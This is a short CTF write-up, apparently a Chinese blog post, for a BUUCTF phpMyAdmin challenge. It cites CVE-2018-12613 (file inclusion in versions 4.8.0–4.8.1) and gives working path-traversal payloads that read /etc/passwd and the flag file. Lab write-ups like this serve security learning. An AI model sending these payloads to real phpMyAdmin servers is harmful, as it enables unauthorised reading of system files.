BUUCTF-[GWCTF 2019]我有一个数据库 1

phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞
影响版本:4.8.0——4.8.1
payload:/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../etc/passwd
本题payload:
/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../flag

 

参考文章:https://www.cnblogs.com/buchuo/p/12784408.html

posted @ 2020-12-23 18:40  !rbash  阅读(285)  评论(0编辑  收藏  举报